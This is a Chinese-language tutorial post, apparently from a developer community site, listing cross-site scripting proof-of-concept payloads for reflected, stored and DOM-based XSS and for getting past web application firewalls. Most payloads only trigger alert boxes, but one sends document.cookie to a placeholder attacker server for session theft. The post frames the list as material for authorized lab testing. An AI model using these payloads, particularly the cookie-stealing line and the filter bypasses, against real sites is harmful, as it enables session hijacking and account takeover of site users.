通用基础 POC(验证是否存在 XSS)

这类 POC 用于快速检测漏洞,核心是让浏览器执行一段简单脚本(如弹框)。

  1. 最基础的弹框 POC

    html

    预览

    <script>alert("XSS")</script>

    原理:触发 JavaScript 的alert函数,弹出包含XSS的对话框,证明脚本被执行。

  2. 标签闭合型 POC(针对输入在 HTML 标签内的场景)若输入被包裹在<input value="输入点"><div>输入点</div>中,需先闭合原有标签再注入脚本:

    html

    预览

    "><script>alert(1)</script>//

    说明:"> 闭合前面的value属性引号和标签,// 注释掉后面的多余内容,避免语法错误。

  3. 无括号 / 引号的绕过 POC部分场景会过滤括号或引号,可使用简写方式:

    html

    预览

    <script>alert`1`</script>

    原理:ES6 模板字符串支持用反引号 ` 代替括号。

二、 反射型 XSS 专用 POC

反射型 XSS 的脚本通过 URL 参数传入,仅在当前请求中生效,常用 POC 需适配 URL 编码场景:

  1. URL 编码后的 POC若参数未自动解码,需对特殊字符(如<>/")进行 URL 编码:

    plaintext

    %3Cscript%3Ealert(%22XSS%22)%3C/script%3E

    对应原始脚本:<script>alert("XSS")</script>

  2. img 标签绕过 POC(无 script 标签场景)script标签被过滤,可使用img等标签的事件属性触发脚本:

    html

    预览

    <img src=x onerror=alert(1)>

    原理:src=x 构造无效图片地址,触发onerror事件执行alert

三、 存储型 XSS 专用 POC

存储型 XSS 的脚本会被服务器存储(如留言板、数据库),所有访问该页面的用户都会触发,POC 需更隐蔽且稳定:

  1. 持久化弹框 POC

    html

    预览

    <svg onload=alert(document.domain)>

    说明:svg标签是 HTML5 标准标签,部分 WAF 对其检测较松;onload事件在标签加载时触发;document.domain可获取当前域名,便于确认漏洞影响范围。

  2. 利用 iframe 的 POC(用于窃取 Cookie 等操作)

    html

    预览

    <script>document.location='http://你的服务器/steal?cookie='+document.cookie</script>

    原理:将当前页面的cookie发送到攻击者服务器,靶场测试时需替换为自己的测试服务器地址

四、 DOM 型 XSS 专用 POC

DOM 型 XSS 不经过服务器,直接通过前端 JavaScript 操作 DOM 触发,POC 需针对 DOM 注入点设计:

  1. 利用 innerHTML 的 POC若前端通过element.innerHTML = 输入内容渲染页面,可直接注入:

    html

    预览

    <img src=1 onerror=alert('DOM XSS')>

  2. 利用 location.hash 的 POC若注入点是location.hash(URL 中#后的部分),POC 可写为:

    html

    预览

    #<script>alert(1)</script>

    说明:#后的内容不会发送到服务器,完全在前端解析。

五、 绕过 WAF 的进阶 POC

若靶场有 WAF(Web 应用防火墙)过滤关键词,可使用以下绕过技巧:

  1. 大小写混淆绕过

    html

    预览

    <ScRiPt>alert(1)</ScRiPt>

    原理:部分 WAF 仅过滤小写的script标签,大小写混合可绕过检测。

  2. 标签嵌套绕过

    html

    预览

    <scr<script>ipt>alert(1)</scr</script>ipt>

    原理:中间的<script>被 WAF 过滤后,剩余部分拼接成完整的<script>alert(1)</script>

  3. 利用 HTML 实体编码绕过

    html

    预览

    &#60;script&#62;alert(1)&#60;/script&#62;

    说明:&#60;对应<&#62;对应>,部分前端会自动解码实体并执行。

重要注意事项

  1. 所有 POC仅可在授权的靶场、测试环境中使用,未经授权测试他人网站属于违法行为。
  2. 不同靶场的过滤规则不同,需根据实际情况调整 POC(如过滤alert可替换为confirmconsole.log)。
# xss # 前端
Logo
腾讯云开发者社区

腾讯云面向开发者汇聚海量精品云计算使用和开发经验,营造开放的云计算技术生态圈。

更多推荐

终极指南:Flink SQL连接器版本管理从混乱到有序的升级之路

Apache Flink作为流处理领域的佼佼者,其SQL连接器的版本管理一直是开发者面临的核心挑战。本文将系统讲解Flink SQL连接器版本管理的最佳实践,帮助你轻松应对版本兼容性问题,实现从混乱到有序的升级之旅。## 连接器版本管理的常见痛点 😫在Flink应用开发中,连接器版本管理常常让开发者头疼不已。不同版本的连接器可能导致各种兼容性问题,例如API变更、功能差异甚至运行时错误。

avatar 腾讯云开发者社区

Elasticsearch复杂数据类型终极指南:从入门到精通

Elasticsearch作为功能强大的搜索引擎,支持多种复杂数据类型,让开发者能够灵活处理各种结构化和非结构化数据。本文将带你全面了解Elasticsearch中的复杂数据类型,从基础概念到实际应用,助你轻松掌握数据建模的核心技巧。## 内部对象:构建层级化数据结构在Elasticsearch中,对象类型(Object)是最基础的复杂数据类型之一,用于表示具有嵌套关系的数据。例如,我们可

avatar 腾讯云开发者社区

如何快速搭建Neon无服务器PostgreSQL:面向初学者的完整指南

Neon是一款革命性的无服务器PostgreSQL解决方案,它通过分离存储和计算层,实现了自动扩缩容、类代码式数据库分支以及零级扩展能力。本指南将帮助你从零开始搭建Neon开发环境,体验这款创新数据库的强大功能。## 准备工作:环境要求与依赖项在开始搭建Neon环境前,请确保你的系统满足以下要求:- Linux操作系统(推荐Ubuntu 20.04+或Debian 11+)- Git

avatar 腾讯云开发者社区